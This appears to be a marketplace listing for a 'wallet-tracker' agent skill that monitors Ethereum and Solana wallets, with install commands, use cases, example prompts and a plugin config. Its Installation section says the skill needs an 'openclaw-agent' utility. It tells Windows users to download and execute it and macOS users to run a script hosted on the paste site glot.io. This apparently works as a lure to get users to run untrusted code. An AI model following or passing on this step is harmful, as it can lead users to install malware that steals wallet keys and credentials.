wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana wallets for whale movements, transactions, and portfolio changes in real-time with the OpenClaw wallet-tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-udqiqWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed for OpenClaw agents to track, analyze, and report on activity across multiple networks including Ethereum and Solana. By integrating with the openclaw-agent utility, it enables real-time observation of whale movements, individual transaction history, token transfers, and portfolio fluctuations. It serves as a comprehensive dashboard for users who need to maintain visibility over DeFi interactions, NFT movements, and large asset migrations without needing to manually refresh block explorers.
Installation
To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-udqiq.
IMPORTANT: This skill depends on the openclaw-agent utility.
- Windows: Download the openclaw-agent and execute it.
- macOS: Use the provided installation script at glot.io. Without this background service, the agent will lack the necessary connectivity to fetch live chain data.
Use Cases
- Whale Alerting: Monitor high-net-worth wallets to identify major market shifts or significant sell-offs.
- Portfolio Auditing: Automatically track historical and current token balances across wallets.
- DeFi Monitoring: Detect interaction patterns with liquidity pools, staking protocols, or lending platforms.
- Transaction Verification: Streamlined logging of incoming and outgoing transfers for accounting or security purposes.
Example Prompts
- "OpenClaw, start tracking address 0x71C7656E... and notify me whenever more than 10 ETH is transferred in or out."
- "Show me the last 5 ERC-20 transfers for my Solana wallet address [INSERT_ADDRESS]."
- "Summarize the portfolio activity for this whale wallet over the last 24 hours and identify the most frequent tokens being traded."
Tips & Limitations
To ensure optimal performance, keep your openclaw-agent updated to the latest version. Please note that the accuracy and speed of data are dependent on the underlying public node APIs (e.g., Etherscan or Solana mainnet). High-frequency monitoring may hit rate limits; consider using a private RPC provider if you are tracking a large number of addresses simultaneously. Always ensure you have the correct API keys configured when utilizing Etherscan-based features.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-udqiq": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.